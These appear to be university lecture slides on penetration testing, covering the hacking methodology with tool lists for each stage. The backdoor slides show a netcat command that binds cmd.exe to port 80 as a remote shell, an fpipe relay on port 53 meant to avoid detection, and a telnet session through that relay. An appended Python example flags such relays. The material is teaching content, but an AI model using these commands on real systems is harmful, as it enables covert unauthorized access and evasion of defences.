Penetration Testing

Penetration Testing
C. Edward Chow
cs591
1
chow
Outline of The Talk

- Definition, Concepts on Penetration Testing/Hacking
- Anatomy of a Hack
- Framework for penetration studies
- Skills and Requirements of a Penetration Tester
- SANS list of Security Holes
- Internet Penetration
- Dial up Penetration
- Internal Penetration

References:
- CORE IMPACT - Penetration Testing: Assessing Your Overall Security Before Attackers Do
- Pages 165, 277 of Security in Computing.
- Hack I.T., Security Through Penetration Testing, by T.J. Klevinsky, Scott Laliberte, Ajay Gupta.
- http://www.hackingexposed.com/win2k/links.html
Definition

- Vulnerability (Security Flaw): a specific failure of the system to guard against unauthorized access or actions. It can be in procedures, technology (SW or HW), or management.
- Using the failure of the system to violate the site security policy is called exploiting the vulnerability.
- Penetration Study is a test for evaluating the strengths of all security controls on the computer system. It intends to find all possible security holes and provides suggestions for fixing them.
- Penetration Testing is an authorized attempt to violate specific constraints stated in the form of a security or integrity policy.
- Penetration Testing is a testing technique for discovering, understanding, and documenting all the security holes that can be found in a system.
- It is not a proof technique. It can never prove the absence of security flaws. It can only prove their presence.
- Example goals of penetration studies are gaining read or write access to specific objects, files, or accounts; gaining specific privileges; and disruption or denial of the availability of objects.
- What is the difference between penetration testing and hacking/intrusion?
More Thorough Penetration Study

- A more thorough penetration study is to find the proper interpretation of the vulnerabilities found and draw conclusions on the care taken in the design and implementation.
- A simple list of vulnerabilities, although helpful in closing those specific holes, contributes far less to the security of a system.
- In practice, constraints (resource, money, time) affect the penetration study.
Hacking Methodology (Steps)

An excellent description is inside the back cover page of the “Hacking Exposed” text by McClure et al.

Footprinting: whois, nslookup
Scanning: nmap, fping
Enumeration: DumpACL, showmount, legion, rpcinfo
Gaining Access: tcpdump, L0phtcrack, NAT
Escalating Privilege: John the Ripper, getadmin
Pilfering: rhosts, userdata, config files, registry
Covering Tracks: zap, rootkits
Creating Back Doors: cron, at, startup folder, netcat, keystroke logger, remote desktop
Denial of Service: synk4, ping of death, tfn/stacheldraht
Footprinting

- Information gathering. Sam Spade is a Windows-based network query tool.
- Find out the target IP address/phone number range.
  - Why check phone numbers?
- Namespace acquisition. Network topology (VisualRoute).
- It is essential to a “surgical” attack.
- The key here is not to miss any details.
- Note that for a penetration tester, this step is to avoid testing others instead of your client and to include all systems to be tested (sometimes the organization will not tell you what their systems consist of).
- Defense: deploy NIDS (snort), RotoRouter

Techniques and tools:
Open source search: Google, search engines, Edgar
Find domain name, admin, IP addresses, name servers: whois (Network Solutions; ARIN)
DNS zone transfer: nslookup (ls -d), dig, Sam Spade
Scanning

- Bulk target assessment.
- Which machines are up and what ports (services) are open.
- Focus on the most promising avenues of entry.
- To avoid being detected, these tools can reduce the frequency of packet sending and randomize the ports or IP addresses to be scanned in the sequence.
- Note that some machines do not respond to ping but respond to requests to ports that are actually open. Ardor is an example.

Techniques and tools:
Ping sweep: fping, icmpenum, WS_Ping ProPack, nmap
TCP/UDP port scan: nmap, Superscan, fscan
OS detection: nmap, queso, siphon
Enumeration

- Identify valid user accounts or poorly protected resource shares.
- More intrusive probing than the scanning step.

Techniques and tools:
List user accounts: null sessions, DumpACL, sid2user, OnSiteAdmin
List file shares: showmount, NAT, legion
Identify applications: banner grabbing with telnet or netcat, rpcinfo
Gaining Access

- Based on the information gathered so far, make an informed attempt to access the target.

Techniques and tools:
Password eavesdropping: tcpdump/ssldump, L0phtcrack readsmb
File share brute forcing: NAT, legion
Password file grab: tftp, pwdump2 (NT)
Buffer overflow: ttdb, bind, IIS .HTR/ISM.DLL
Escalating Privilege

- If only user-level access was obtained in the last step, seek to gain complete control of the system.

Techniques and tools:
Password cracking: John the Ripper, L0phtcrack
Known exploits: lc_messages, getadmin, sechole
Pilfering

- Webster's Revised Unabridged Dictionary (1913): Pilfer \Pil"fer\, v. i. [imp. & p. p. Pilfered; p. pr. & vb. n. Pilfering.] [OF. pelfrer. See Pelf.] To steal in small quantities, or articles of small value; to practice petty theft.
- Gather information to identify mechanisms that allow access to trusted systems.

Techniques and tools:
Evaluate trusts: rhosts, LSA secrets
Search for cleartext passwords: user data, configuration files, registry
Covering Tracks

- Once total ownership of the target is secured, hiding this fact from system administrators becomes paramount, lest they quickly end the romp.

Techniques and tools:
Clear logs: Zap, Event Log GUI
Hide tools: rootkits, file streaming
Creating Back Doors

- Trap doors will be laid in various parts of the system to ensure that privileged access is easily regained whenever the intruder decides.

Techniques and tools:
Create rogue user accounts: members of wheel, admin
Schedule batch jobs: cron, at
Infect startup files: rc, startup folder, registry keys
Plant remote control services: netcat, remote.exe, VNC, BO2K, remote desktop
Install monitoring mechanisms: keystroke loggers, add acct. to secadmin mail aliases
Replace apps with Trojans: login, fpnwclnt.dll
Denial of Service

- If an attacker is unsuccessful in gaining access, they may use readily available exploit code to disable a target as a last resort.

Techniques and tools:
SYN flood: synk4
ICMP techniques: ping of death, smurf
Identical src/dst SYN requests: land, latierra
Overlapping fragment/offset bugs
Out of bounds TCP options (OOB)
DDoS: Trinoo, TFN, stacheldraht
Nessus: Integrated Security Scanning Tool

- Originally designed by Renaud Deraison
- Available at www.nessus.org
- Main scanning engine running on a Unix server with client GUI running on Unix or Windows.
- Pretty good control and reporting.
- Includes a script language for plug-ins (detecting additional attacks).
- http://www.nessus.org/pres/bh2001/index.html
Setting up Backdoor Connection

- Once admin privilege is obtained, you install tools that allow you to run commands remotely (e.g. netcat) or use the machine as a stepping stone for relaying or redirecting messages (fpipe).
- Port redirection accepts packets from one port and sends them over another port. It can be used to avoid a packet-filter firewall.
- We will use netcat and fpipe to illustrate the concept.
- Netcat is available at http://www.atstake.com/research/tools/network_utilities/
- Fpipe is available at http://www.foundstone.com
Setup Netcat

C:\work\cucs\cs522\project>c:\work\software\security\nc\nc -v -L -e cmd.exe -p 80 -s 128.198.177.63
listening on [128.198.177.63] 80 ...
connect to [128.198.177.63] from VIVIAN.eas.uccs.edu
listening on [128.198.177.63] 80 ...
connect to [128.198.177.63] from VIVIAN.eas.uccs.edu

- The hacker runs the nc command on the victim machine, which listens for commands sent in on port 80, uses cmd.exe to run each command and sends the console output back as the HTTP response.
- Here we bind in front of port 80. You can also use port 139. The idea is to use a known port to avoid detection.
- -L is used to repeat the previous command after the connection is terminated.
- The nc command will receive the command from the packet to port 80, run it with cmd.exe and send back the execution result.
Setup FPIPE

C:\work\software\security\fpipe>fpipe -l 53 -s 53 -r 80 128.198.177.63
FPipe v2.1 - TCP/UDP port redirector.
Copyright 2000 (c) by Foundstone, Inc.
http://www.foundstone.com

Pipe connected:
In: 128.198.162.60:58797 --> 128.198.168.63:53
Out: 128.198.168.63:53 --> 128.198.177.63:80
Pipe connected:
In: 128.198.162.60:58801 --> 128.198.168.63:53
Out: 128.198.168.63:53 --> 128.198.177.63:80

- This is run on the infected machine, which serves as the relay. Use port 53 to listen for the Internet connection, and relay any message arriving on port 53 to the machine 128.198.177.63 on port 80.
- Here the fpipe program listens for packets incoming from blanca to port 53 and relays them over to 128.198.177.63, using port 53 (DNS) to avoid detection.

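A defender's check on the relay pattern shown above, as an added example that is not part of the lecture: it parses fpipe-style "Pipe connected" lines (a constructed sample modelled on the slide's output, not a capture from the lecture's machines) and reports any listener on a well-known port, such as 53, whose traffic is forwarded to a different port on another host. The same borrowed-port heuristic applies to the netcat listener bound to port 80 on the previous slide.

```python
import re

# Constructed sample modelled on the "Pipe connected" lines fpipe prints in the
# slides; these are not captures from the lecture's own machines.
FPIPE_LOG = """\
Pipe connected:
In: 128.198.162.60:58797 --> 128.198.168.63:53
Out: 128.198.168.63:53 --> 128.198.177.63:80
Pipe connected:
In: 128.198.162.60:58801 --> 128.198.168.63:53
Out: 128.198.168.63:53 --> 128.198.177.63:80
"""

ENDPOINT = r"(\d{1,3}(?:\.\d{1,3}){3}):(\d+)"
LINE_RE = re.compile(rf"^(In|Out):\s+{ENDPOINT}\s+-->\s+{ENDPOINT}$")

# Ports a relay is likely to hide behind; the slides use 53 (DNS) and 80 (HTTP)
# and mention 139 for exactly that reason.
WELL_KNOWN = {53: "dns", 80: "http", 139: "netbios-ssn"}


def parse_fpipe_log(text):
    """Pair each 'In:' line with the following 'Out:' line into (client, listener, target)."""
    relays, pending = [], None
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        kind, sip, sport, dip, dport = m.groups()
        src, dst = (sip, int(sport)), (dip, int(dport))
        if kind == "In":
            pending = (src, dst)  # client -> relay listener
        elif kind == "Out" and pending and pending[1] == src:
            relays.append((pending[0], pending[1], dst))  # listener -> target
            pending = None
    return relays


def flag_port_redirection(relays):
    """Report listeners on a well-known port that forward to a different port.

    Each (listener, target) chain is reported once, with its client IPs, so a
    host answering on 53/tcp but handing the bytes to port 80 stands out.
    """
    chains = {}
    for client, listener, target in relays:
        chains.setdefault((listener, target), set()).add(client[0])
    return [(lst, tgt, sorted(cl)) for (lst, tgt), cl in sorted(chains.items())
            if lst[1] in WELL_KNOWN and tgt[1] != lst[1]]
```

Run over the two connections in the sample it reports a single chain, 128.198.168.63:53 forwarding to 128.198.177.63:80, reached from 128.198.162.60.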
Telnet to the relay host

[cs691@blanca cs691]$ telnet 128.198.168.63 53
Trying 128.198.168.63...
Connected to vivian (128.198.168.63).
Escape character is '^]'.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\work\cucs\cs522\project>dir
dir
 Volume in drive C is S3A1203D501
 Volume Serial Number is 503B-9F00

 Directory of C:\work\cucs\cs522\project

04/29/2003  12:56 PM    <DIR>          .
04/29/2003  12:56 PM    <DIR>          ..
04/29/2003  12:50 PM           371,208 erniestInfocom2000.ps

Note that it is the console output of the 128.198.177.63 machine that is shown here.
Layering of Tests

1. External attacker with no knowledge of the system.
2. External attacker with access to the system.
3. Internal attacker with access to the system.